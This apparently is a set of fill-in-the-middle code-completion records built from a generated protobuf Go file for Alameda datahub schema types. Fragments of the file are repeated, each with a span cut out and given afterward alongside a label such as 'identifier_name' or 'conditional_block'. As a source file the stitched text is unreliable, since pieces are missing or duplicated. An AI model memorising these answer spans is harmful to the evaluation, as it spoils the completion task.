func (Scope) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
type SchemaMeta struct {
Table Table `protobuf:"varint,1,opt,name=table,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Table" json:"table,omitempty"`
Scope Scope `protobuf:"varint,2,opt,name=scope,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Scope" json:"scope,omitempty"`
Category string `protobuf:"bytes,3,opt,name=category,proto3" json:"category,omitempty"`
Type string `protobuf:"bytes,4,opt,name=type,proto3" json:"type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *SchemaMeta) Reset() { *m = SchemaMeta{} }
func (m *SchemaMeta) String() string { return proto.CompactTextString(m) }
func (*SchemaMeta) ProtoMessage() {}
func (*SchemaMeta) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
func (m *SchemaMeta) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_SchemaMeta.Unmarshal(m, b)
}
func (m *SchemaMeta) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_SchemaMeta.Marshal(b, m, deterministic)
}
func (m *SchemaMeta) XXX_Merge(src proto.Message) {
xxx_messageInfo_SchemaMeta.Merge(m, src)
}
func (m *SchemaMeta) XXX_Size() int {
return xxx_messageInfo_SchemaMeta.Size(m)
}
func (m *SchemaMeta) XXX_DiscardUnknown() {
xxx_messageInfo_SchemaMeta.DiscardUnknown(m)
}
var xxx_messageInfo_SchemaMeta proto.InternalMessageInfo
func (m *SchemaMeta) GetTable() Table {
if m != nil {
return m.Table
}
return Table_TABLE_UNDEFINED
}
func (m *SchemaMeta) GetScope() Scope {
if m != nil {
return m.Scope
}
return Scope_SCOPE_UNDEFINED
}
func (m *SchemaMeta) GetCategory() string {
if m != nil {
return m.Category
}
return ""
}
func (m *SchemaMeta) GetType() string {
if m != nil {
return m.Type
}
return ""
}
type Mesaurement struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
MetricType common.MetricType `protobuf:"varint,2,opt,name=metric_type,json=metricType,proto3,enum=containersai.alameda.v1alpha1.datahub.common.MetricType" json:"metric_type,omitempty"`
Columns []*Column `protobuf:"bytes,3,rep,name=columns,proto3" json:"columns,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Mesaurement) Reset() { *m = Mesaurement{} }
func (m *Mesaurement) String() string { return proto.CompactTextString(m) }
func (*Mesaurement) ProtoMessage() {}
func (*Mesaurement) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
func (m *Mesaurement) | (b []byte) error {
return xxx_messageInfo_Mesaurement.Unmarshal(m, b)
}
func (m *Mesaurement) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Mesaurement.Marshal(b, m, deterministic)
}
func (m *Mesaurement) XXX_Merge(src proto.Message) {
xxx_messageInfo_Mesaurement.Merge(m, src)
}
func (m *Mesaurement) XXX_Size() int {
return xxx_messageInfo_Mesaurement.Size(m)
}
func (m *Mesaurement) XXX_DiscardUnknown() {
xxx_messageInfo_Mesaurement.DiscardUnknown(m)
}
var xxx_messageInfo_Mesaurement proto.InternalMessageInfo
func (m *Mesaurement) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Mesaurement) GetMetricType() common.MetricType {
if m != nil {
return m.MetricType
}
return common.MetricType_METRICS_TYPE_UNDEFINED
}
func (m *Mesaurement) GetColumns() []*Column {
if m != nil {
return m.Columns
}
return nil
}
type Column struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
Required bool `protobuf:"varint,2,opt,name=required,proto3" json:"required,omitempty"`
ColumnTypes common1.ColumnType `protobuf:"varint,3,opt,name=column_types,json=columnTypes,proto3,enum=containersai.common.ColumnType" json:"column_types,omitempty"`
DataTypes common1.DataType `protobuf:"varint,4,opt,name=data_types,json=dataTypes,proto3,enum=containersai.common.DataType" json:"data_types,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Column) Reset() { *m = Column{} }
func (m *Column) String() string { return proto.CompactTextString(m) }
func (*Column) ProtoMessage() {}
func (*Column) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{2}
}
func (m *Column) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Column.Unmarshal(m, b)
}
func (m *Column) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Column.Marshal(b, m, deterministic)
}
func (m *Column) XXX_Merge(src proto.Message) {
xxx_messageInfo_Column.Merge(m, src)
}
func (m *Column) XXX_Size() int {
return xxx_messageInfo_Column.Size(m)
}
func (m *Column) XXX_DiscardUnknown() {
xxx_messageInfo_Column.DiscardUnknown(m)
}
var xxx_messageInfo_Column proto.InternalMessageInfo
func (m *Column) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Column) GetRequired() bool {
if m != nil {
return m.Required
}
return false
}
func (m *Column) GetColumnTypes() common1.ColumnType {
if m != nil {
return m.ColumnTypes
}
return common1.ColumnType_COLUMNTYPE_UDEFINED
}
func (m *Column) GetDataTypes() common1.DataType {
if m != nil {
return m.DataTypes
}
return common1.DataType_DATATYPE_UNDEFINED
}
func init() {
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Table", Table_name, Table_value)
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Scope", Scope_name, Scope_value)
proto.RegisterType((*SchemaMeta)(nil), "containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta")
proto.RegisterType((*Mesaurement)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Mesaurement")
proto.RegisterType((*Column)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Column")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/schemas/types.proto", fileDescriptor_01194bf23370964f)
}
var fileDescriptor_01194bf23370964f = []byte{
// 522 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x54, 0xcd, 0x6a, 0xdb, 0x4c,
0x14, 0xfd, 0xe4, 0xbf, 0xcf, 0xbe, 0x0e, 0xae, 0x3a, 0x4d, 0x41, 0x18, 0x4a, 0x8d, 0x57, 0x26,
0x10, 0xa9, 0x76, 0x5b, 0xe8, 0xa2, 0x1b, 0x5b, 0x56, 0x83, 0x8a, 0x25, 0x99, 0xb1, 0xb2, 0x68,
0x37, 0x66, 0x2c, 0x0f, 0xb1, 0xc0, 0xfa, 0xa9, 0x66, 0x5c, 0xf0, 0xc3, 0xf4, 0x45, 0xfa, 0x0e,
0xdd, 0xf5, 0x81, 0x8a, 0x66, 0xc6, 0x4a, 0x02, 0xa1, 0x24, 0xdd, 0xdd, 0x39, 0xcc, 0x39, 0xf7,
0x9c, 0xcb, 0x9d, 0x81, 0x37, 0x64, 0x4f, 0x12, 0xba, 0x25, 0x6b, 0x92, 0xc7, 0xd6, 0xf7, 0x31,
0xd9, 0xe7, 0x3b, 0x32, 0xb6, 0xb6, 0x84, 0x93, 0xdd, 0x61, 0x63, 0xb1, 0x68, 0x47, 0x13, 0xc2,
0x2c, 0x7e, 0xcc, 0x29, 0x33, 0xf3, 0x22, 0xe3, 0x19, 0xba, 0x8c, 0xb2, 0x94, 0x93, 0x38, 0xa5,
0x05, 0x23, 0xb1, 0xa9, 0xe8, 0xe6, 0x89, 0x6a, 0x2a, 0xaa, 0xa9, 0xa8, 0xfd, 0xf1, 0x5f, 0x1b,
0x44, 0x59, 0x92, 0x64, 0xa9, 0x95, 0x50, 0x5e, 0xc4, 0x91, 0xea, 0xd0, 0x47, 0x0a, 0xbd, 0xd3,
0x75, 0xf8, 0x5b, 0x03, 0x58, 0x09, 0x49, 0x8f, 0x72, 0x82, 0x3e, 0x43, 0x93, 0x93, 0xcd, 0x9e,
0x1a, 0xda, 0x40, 0x1b, 0xf5, 0x26, 0xef, 0xcc, 0x27, 0x99, 0x32, 0xc3, 0x92, 0x8b, 0xa5, 0x44,
0xa9, 0xc5, 0xa2, 0x2c, 0xa7, 0x46, 0xed, 0x9f, 0xb4, 0x56, 0x25, 0x17, 0x4b, 0x09, 0xd4, 0x87,
0x76, 0x44, 0x38, 0xbd, 0xc9, 0x8a, 0xa3, 0x51, 0x1f, 0x68, 0xa3, 0x0e, 0xae, 0xce, 0x08, 0x41,
0xa3, 0x4c, 0x64, 0x34, 0x04, 0x2e, 0xea, 0xe1, 0x2f, 0x0d, 0xba, 0x1e, 0x65, 0xe4, 0x50, 0xd0,
0x84, 0xa6, 0xbc, 0xbc, 0x93, 0x92, 0x44, 0xc6, 0xea, 0x60, 0x51, 0xa3, 0x2f, 0xd0, 0x95, 0xf3,
0x59, 0x0b, 0xba, 0x74, 0xf9, 0xe1, 0x91, 0x2e, 0xe5, 0x28, 0x4d, 0x4f, 0x08, 0x84, 0xc7, 0x9c,
0x62, 0x48, 0xaa, 0x1a, 0x05, 0xf0, 0x7f, 0x94, 0xed, 0x0f, 0x49, 0xca, 0x8c, 0xfa, 0xa0, 0x3e,
0xea, 0x4e, 0xde, 0x3f, 0x31, 0xbc, 0x2d, 0xd8, 0xf8, 0xa4, 0x32, 0xfc, 0xa9, 0x41, 0x4b, 0x62,
0x0f, 0x46, 0xe9, 0x43, 0xbb, 0xa0, 0xdf, 0x0e, 0x71, 0x41, 0xb7, 0x22, 0x47, 0x1b, 0x57, 0x67,
0x34, 0x83, 0x33, 0xa9, 0x22, 0x62, 0x32, 0x31, 0xbe, 0xde, 0xe4, 0xf5, 0x7d, 0x43, 0x2a, 0x8e,
0x6c, 0x21, 0xe2, 0x74, 0xa3, 0xaa, 0x66, 0xe8, 0x23, 0x40, 0xe9, 0x50, 0x29, 0x34, 0x84, 0xc2,
0xab, 0x07, 0x15, 0xe6, 0x84, 0x13, 0xc1, 0xef, 0x6c, 0x55, 0xc5, 0x2e, 0x7e, 0x68, 0xd0, 0x14,
0x9b, 0x81, 0x5e, 0xc0, 0xb3, 0x70, 0x3a, 0x5b, 0x38, 0xeb, 0x6b, 0x7f, 0xee, 0x7c, 0x72, 0x7d,
0x67, 0xae, 0xff, 0x87, 0x5e, 0xc2, 0x73, 0x09, 0x4e, 0x97, 0xcb, 0x85, 0x6b, 0x4f, 0x43, 0x37,
0xf0, 0x75, 0x0d, 0xe9, 0x70, 0x26, 0x61, 0xcf, 0x09, 0xb1, 0x6b, 0xeb, 0x35, 0x84, 0xa0, 0x27,
0x91, 0xe5, 0x62, 0xea, 0xfb, 0xae, 0x7f, 0xa5, 0xd7, 0xd1, 0x39, 0xe8, 0x0a, 0xc3, 0xce, 0xdc,
0xb5, 0x05, 0xb7, 0x71, 0x7b, 0x13, 0x3b, 0xab, 0xe0, 0x1a, 0xdb, 0x8e, 0xde, 0x44, 0x06, 0x9c,
0x9f, 0x30, 0x3b, 0xf0, 0x3c, 0xc7, 0x9f, 0xcb, 0x4e, 0xad, 0x8b, 0x2b, 0x68, 0x8a, 0x65, 0x2b,
0xed, 0xad, 0xec, 0x60, 0x79, 0xdf, 0x1e, 0x82, 0x9e, 0x04, 0x2b, 0x2d, 0xad, 0xb4, 0x2c, 0xb1,
0xbb, 0x96, 0x6b, 0x33, 0xfb, 0xeb, 0xf4, 0x26, 0xe6, 0x6a, 0x3d, 0xac, 0xdb, 0xf1, 0x5c, 0x92,
0xd8, 0x2a, 0x9f, 0xe9, 0x63, 0xfe, 0x84, 0x4d, 0x4b, 0x3c, 0xcc, 0xb7, 0x7f, 0x02, 0x00, 0x00,
0xff, 0xff, 0xcd, 0x69, 0x6a, 0x34, 0x42, 0x04, 0x00, 0x00,
}
| XXX_Unmarshal | identifier_name |
types.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/schemas/types.proto
package schemas
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
common1 "github.com/containers-ai/api/common"
proto "github.com/golang/protobuf/proto"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
type Table int32
const (
Table_TABLE_UNDEFINED Table = 0
Table_TABLE_APPLICATION Table = 1
Table_TABLE_METRIC Table = 2
Table_TABLE_PLANNING Table = 3
Table_TABLE_PREDICTION Table = 4
Table_TABLE_RESOURCE Table = 5
Table_TABLE_RECOMMENDATION Table = 6
)
var Table_name = map[int32]string{
0: "TABLE_UNDEFINED",
1: "TABLE_APPLICATION",
2: "TABLE_METRIC",
3: "TABLE_PLANNING",
4: "TABLE_PREDICTION",
5: "TABLE_RESOURCE",
6: "TABLE_RECOMMENDATION",
}
var Table_value = map[string]int32{
"TABLE_UNDEFINED": 0,
"TABLE_APPLICATION": 1,
"TABLE_METRIC": 2,
"TABLE_PLANNING": 3,
"TABLE_PREDICTION": 4,
"TABLE_RESOURCE": 5,
"TABLE_RECOMMENDATION": 6,
}
func (x Table) String() string {
return proto.EnumName(Table_name, int32(x))
}
func (Table) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
type Scope int32
const (
Scope_SCOPE_UNDEFINED Scope = 0
Scope_SCOPE_RESOURCE Scope = 1
Scope_SCOPE_APPLICATION Scope = 2
)
var Scope_name = map[int32]string{
0: "SCOPE_UNDEFINED",
1: "SCOPE_RESOURCE",
2: "SCOPE_APPLICATION",
}
var Scope_value = map[string]int32{
"SCOPE_UNDEFINED": 0,
"SCOPE_RESOURCE": 1,
"SCOPE_APPLICATION": 2,
}
func (x Scope) String() string {
return proto.EnumName(Scope_name, int32(x))
}
func (Scope) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
type SchemaMeta struct {
Table Table `protobuf:"varint,1,opt,name=table,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Table" json:"table,omitempty"`
Scope Scope `protobuf:"varint,2,opt,name=scope,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Scope" json:"scope,omitempty"`
Category string `protobuf:"bytes,3,opt,name=category,proto3" json:"category,omitempty"`
Type string `protobuf:"bytes,4,opt,name=type,proto3" json:"type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *SchemaMeta) Reset() { *m = SchemaMeta{} }
func (m *SchemaMeta) String() string { return proto.CompactTextString(m) }
func (*SchemaMeta) ProtoMessage() {}
func (*SchemaMeta) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
func (m *SchemaMeta) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_SchemaMeta.Unmarshal(m, b)
}
func (m *SchemaMeta) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_SchemaMeta.Marshal(b, m, deterministic)
}
func (m *SchemaMeta) XXX_Merge(src proto.Message) {
xxx_messageInfo_SchemaMeta.Merge(m, src)
}
func (m *SchemaMeta) XXX_Size() int {
return xxx_messageInfo_SchemaMeta.Size(m)
}
func (m *SchemaMeta) XXX_DiscardUnknown() {
xxx_messageInfo_SchemaMeta.DiscardUnknown(m)
}
var xxx_messageInfo_SchemaMeta proto.InternalMessageInfo
func (m *SchemaMeta) GetTable() Table {
if m != nil {
return m.Table
}
return Table_TABLE_UNDEFINED
}
func (m *SchemaMeta) GetScope() Scope {
if m != nil {
return m.Scope
}
return Scope_SCOPE_UNDEFINED
}
func (m *SchemaMeta) GetCategory() string {
if m != nil {
return m.Category
}
return ""
}
func (m *SchemaMeta) GetType() string {
if m != nil |
return ""
}
type Mesaurement struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
MetricType common.MetricType `protobuf:"varint,2,opt,name=metric_type,json=metricType,proto3,enum=containersai.alameda.v1alpha1.datahub.common.MetricType" json:"metric_type,omitempty"`
Columns []*Column `protobuf:"bytes,3,rep,name=columns,proto3" json:"columns,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Mesaurement) Reset() { *m = Mesaurement{} }
func (m *Mesaurement) String() string { return proto.CompactTextString(m) }
func (*Mesaurement) ProtoMessage() {}
func (*Mesaurement) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
func (m *Mesaurement) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Mesaurement.Unmarshal(m, b)
}
func (m *Mesaurement) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Mesaurement.Marshal(b, m, deterministic)
}
func (m *Mesaurement) XXX_Merge(src proto.Message) {
xxx_messageInfo_Mesaurement.Merge(m, src)
}
func (m *Mesaurement) XXX_Size() int {
return xxx_messageInfo_Mesaurement.Size(m)
}
func (m *Mesaurement) XXX_DiscardUnknown() {
xxx_messageInfo_Mesaurement.DiscardUnknown(m)
}
var xxx_messageInfo_Mesaurement proto.InternalMessageInfo
func (m *Mesaurement) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Mesaurement) GetMetricType() common.MetricType {
if m != nil {
return m.MetricType
}
return common.MetricType_METRICS_TYPE_UNDEFINED
}
func (m *Mesaurement) GetColumns() []*Column {
if m != nil {
return m.Columns
}
return nil
}
type Column struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
Required bool `protobuf:"varint,2,opt,name=required,proto3" json:"required,omitempty"`
ColumnTypes common1.ColumnType `protobuf:"varint,3,opt,name=column_types,json=columnTypes,proto3,enum=containersai.common.ColumnType" json:"column_types,omitempty"`
DataTypes common1.DataType `protobuf:"varint,4,opt,name=data_types,json=dataTypes,proto3,enum=containersai.common.DataType" json:"data_types,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Column) Reset() { *m = Column{} }
func (m *Column) String() string { return proto.CompactTextString(m) }
func (*Column) ProtoMessage() {}
func (*Column) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{2}
}
func (m *Column) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Column.Unmarshal(m, b)
}
func (m *Column) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Column.Marshal(b, m, deterministic)
}
func (m *Column) XXX_Merge(src proto.Message) {
xxx_messageInfo_Column.Merge(m, src)
}
func (m *Column) XXX_Size() int {
return xxx_messageInfo_Column.Size(m)
}
func (m *Column) XXX_DiscardUnknown() {
xxx_messageInfo_Column.DiscardUnknown(m)
}
var xxx_messageInfo_Column proto.InternalMessageInfo
func (m *Column) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Column) GetRequired() bool {
if m != nil {
return m.Required
}
return false
}
func (m *Column) GetColumnTypes() common1.ColumnType {
if m != nil {
return m.ColumnTypes
}
return common1.ColumnType_COLUMNTYPE_UDEFINED
}
func (m *Column) GetDataTypes() common1.DataType {
if m != nil {
return m.DataTypes
}
return common1.DataType_DATATYPE_UNDEFINED
}
func init() {
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Table", Table_name, Table_value)
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Scope", Scope_name, Scope_value)
proto.RegisterType((*SchemaMeta)(nil), "containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta")
proto.RegisterType((*Mesaurement)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Mesaurement")
proto.RegisterType((*Column)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Column")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/schemas/types.proto", fileDescriptor_01194bf23370964f)
}
var fileDescriptor_01194bf23370964f = []byte{
// 522 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x54, 0xcd, 0x6a, 0xdb, 0x4c,
0x14, 0xfd, 0xe4, 0xbf, 0xcf, 0xbe, 0x0e, 0xae, 0x3a, 0x4d, 0x41, 0x18, 0x4a, 0x8d, 0x57, 0x26,
0x10, 0xa9, 0x76, 0x5b, 0xe8, 0xa2, 0x1b, 0x5b, 0x56, 0x83, 0x8a, 0x25, 0x99, 0xb1, 0xb2, 0x68,
0x37, 0x66, 0x2c, 0x0f, 0xb1, 0xc0, 0xfa, 0xa9, 0x66, 0x5c, 0xf0, 0xc3, 0xf4, 0x45, 0xfa, 0x0e,
0xdd, 0xf5, 0x81, 0x8a, 0x66, 0xc6, 0x4a, 0x02, 0xa1, 0x24, 0xdd, 0xdd, 0x39, 0xcc, 0x39, 0xf7,
0x9c, 0xcb, 0x9d, 0x81, 0x37, 0x64, 0x4f, 0x12, 0xba, 0x25, 0x6b, 0x92, 0xc7, 0xd6, 0xf7, 0x31,
0xd9, 0xe7, 0x3b, 0x32, 0xb6, 0xb6, 0x84, 0x93, 0xdd, 0x61, 0x63, 0xb1, 0x68, 0x47, 0x13, 0xc2,
0x2c, 0x7e, 0xcc, 0x29, 0x33, 0xf3, 0x22, 0xe3, 0x19, 0xba, 0x8c, 0xb2, 0x94, 0x93, 0x38, 0xa5,
0x05, 0x23, 0xb1, 0xa9, 0xe8, 0xe6, 0x89, 0x6a, 0x2a, 0xaa, 0xa9, 0xa8, 0xfd, 0xf1, 0x5f, 0x1b,
0x44, 0x59, 0x92, 0x64, 0xa9, 0x95, 0x50, 0x5e, 0xc4, 0x91, 0xea, 0xd0, 0x47, 0x0a, 0xbd, 0xd3,
0x75, 0xf8, 0x5b, 0x03, 0x58, 0x09, 0x49, 0x8f, 0x72, 0x82, 0x3e, 0x43, 0x93, 0x93, 0xcd, 0x9e,
0x1a, 0xda, 0x40, 0x1b, 0xf5, 0x26, 0xef, 0xcc, 0x27, 0x99, 0x32, 0xc3, 0x92, 0x8b, 0xa5, 0x44,
0xa9, 0xc5, 0xa2, 0x2c, 0xa7, 0x46, 0xed, 0x9f, 0xb4, 0x56, 0x25, 0x17, 0x4b, 0x09, 0xd4, 0x87,
0x76, 0x44, 0x38, 0xbd, 0xc9, 0x8a, 0xa3, 0x51, 0x1f, 0x68, 0xa3, 0x0e, 0xae, 0xce, 0x08, 0x41,
0xa3, 0x4c, 0x64, 0x34, 0x04, 0x2e, 0xea, 0xe1, 0x2f, 0x0d, 0xba, 0x1e, 0x65, 0xe4, 0x50, 0xd0,
0x84, 0xa6, 0xbc, 0xbc, 0x93, 0x92, 0x44, 0xc6, 0xea, 0x60, 0x51, 0xa3, 0x2f, 0xd0, 0x95, 0xf3,
0x59, 0x0b, 0xba, 0x74, 0xf9, 0xe1, 0x91, 0x2e, 0xe5, 0x28, 0x4d, 0x4f, 0x08, 0x84, 0xc7, 0x9c,
0x62, 0x48, 0xaa, 0x1a, 0x05, 0xf0, 0x7f, 0x94, 0xed, 0x0f, 0x49, 0xca, 0x8c, 0xfa, 0xa0, 0x3e,
0xea, 0x4e, 0xde, 0x3f, 0x31, 0xbc, 0x2d, 0xd8, 0xf8, 0xa4, 0x32, 0xfc, 0xa9, 0x41, 0x4b, 0x62,
0x0f, 0x46, 0xe9, 0x43, 0xbb, 0xa0, 0xdf, 0x0e, 0x71, 0x41, 0xb7, 0x22, 0x47, 0x1b, 0x57, 0x67,
0x34, 0x83, 0x33, 0xa9, 0x22, 0x62, 0x32, 0x31, 0xbe, 0xde, 0xe4, 0xf5, 0x7d, 0x43, 0x2a, 0x8e,
0x6c, 0x21, 0xe2, 0x74, 0xa3, 0xaa, 0x66, 0xe8, 0x23, 0x40, 0xe9, 0x50, 0x29, 0x34, 0x84, 0xc2,
0xab, 0x07, 0x15, 0xe6, 0x84, 0x13, 0xc1, 0xef, 0x6c, 0x55, 0xc5, 0x2e, 0x7e, 0x68, 0xd0, 0x14,
0x9b, 0x81, 0x5e, 0xc0, 0xb3, 0x70, 0x3a, 0x5b, 0x38, 0xeb, 0x6b, 0x7f, 0xee, 0x7c, 0x72, 0x7d,
0x67, 0xae, 0xff, 0x87, 0x5e, 0xc2, 0x73, 0x09, 0x4e, 0x97, 0xcb, 0x85, 0x6b, 0x4f, 0x43, 0x37,
0xf0, 0x75, 0x0d, 0xe9, 0x70, 0x26, 0x61, 0xcf, 0x09, 0xb1, 0x6b, 0xeb, 0x35, 0x84, 0xa0, 0x27,
0x91, 0xe5, 0x62, 0xea, 0xfb, 0xae, 0x7f, 0xa5, 0xd7, 0xd1, 0x39, 0xe8, 0x0a, 0xc3, 0xce, 0xdc,
0xb5, 0x05, 0xb7, 0x71, 0x7b, 0x13, 0x3b, 0xab, 0xe0, 0x1a, 0xdb, 0x8e, 0xde, 0x44, 0x06, 0x9c,
0x9f, 0x30, 0x3b, 0xf0, 0x3c, 0xc7, 0x9f, 0xcb, 0x4e, 0xad, 0x8b, 0x2b, 0x68, 0x8a, 0x65, 0x2b,
0xed, 0xad, 0xec, 0x60, 0x79, 0xdf, 0x1e, 0x82, 0x9e, 0x04, 0x2b, 0x2d, 0xad, 0xb4, 0x2c, 0xb1,
0xbb, 0x96, 0x6b, 0x33, 0xfb, 0xeb, 0xf4, 0x26, 0xe6, 0x6a, 0x3d, 0xac, 0xdb, 0xf1, 0x5c, 0x92,
0xd8, 0x2a, 0x9f, 0xe9, 0x63, 0xfe, 0x84, 0x4d, 0x4b, 0x3c, 0xcc, 0xb7, 0x7f, 0x02, 0x00, 0x00,
0xff, 0xff, 0xcd, 0x69, 0x6a, 0x34, 0x42, 0x04, 0x00, 0x00,
}
| {
return m.Type
} | conditional_block |
types.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/schemas/types.proto
package schemas
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
common1 "github.com/containers-ai/api/common"
proto "github.com/golang/protobuf/proto"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
type Table int32
const (
Table_TABLE_UNDEFINED Table = 0
Table_TABLE_APPLICATION Table = 1
Table_TABLE_METRIC Table = 2
Table_TABLE_PLANNING Table = 3
Table_TABLE_PREDICTION Table = 4
Table_TABLE_RESOURCE Table = 5
Table_TABLE_RECOMMENDATION Table = 6
)
var Table_name = map[int32]string{
0: "TABLE_UNDEFINED",
1: "TABLE_APPLICATION",
2: "TABLE_METRIC",
3: "TABLE_PLANNING",
4: "TABLE_PREDICTION",
5: "TABLE_RESOURCE",
6: "TABLE_RECOMMENDATION",
}
var Table_value = map[string]int32{
"TABLE_UNDEFINED": 0,
"TABLE_APPLICATION": 1,
"TABLE_METRIC": 2,
"TABLE_PLANNING": 3,
"TABLE_PREDICTION": 4,
"TABLE_RESOURCE": 5,
"TABLE_RECOMMENDATION": 6,
}
func (x Table) String() string {
return proto.EnumName(Table_name, int32(x))
}
func (Table) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
type Scope int32
const (
Scope_SCOPE_UNDEFINED Scope = 0
Scope_SCOPE_RESOURCE Scope = 1
Scope_SCOPE_APPLICATION Scope = 2
)
var Scope_name = map[int32]string{
0: "SCOPE_UNDEFINED",
1: "SCOPE_RESOURCE",
2: "SCOPE_APPLICATION",
}
var Scope_value = map[string]int32{
"SCOPE_UNDEFINED": 0,
"SCOPE_RESOURCE": 1,
"SCOPE_APPLICATION": 2,
}
func (x Scope) String() string {
return proto.EnumName(Scope_name, int32(x))
}
func (Scope) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
type SchemaMeta struct {
Table Table `protobuf:"varint,1,opt,name=table,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Table" json:"table,omitempty"`
Scope Scope `protobuf:"varint,2,opt,name=scope,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Scope" json:"scope,omitempty"`
Category string `protobuf:"bytes,3,opt,name=category,proto3" json:"category,omitempty"`
Type string `protobuf:"bytes,4,opt,name=type,proto3" json:"type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *SchemaMeta) Reset() { *m = SchemaMeta{} }
func (m *SchemaMeta) String() string { return proto.CompactTextString(m) }
func (*SchemaMeta) ProtoMessage() {}
func (*SchemaMeta) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
func (m *SchemaMeta) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_SchemaMeta.Unmarshal(m, b)
}
func (m *SchemaMeta) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_SchemaMeta.Marshal(b, m, deterministic)
}
func (m *SchemaMeta) XXX_Merge(src proto.Message) {
xxx_messageInfo_SchemaMeta.Merge(m, src)
}
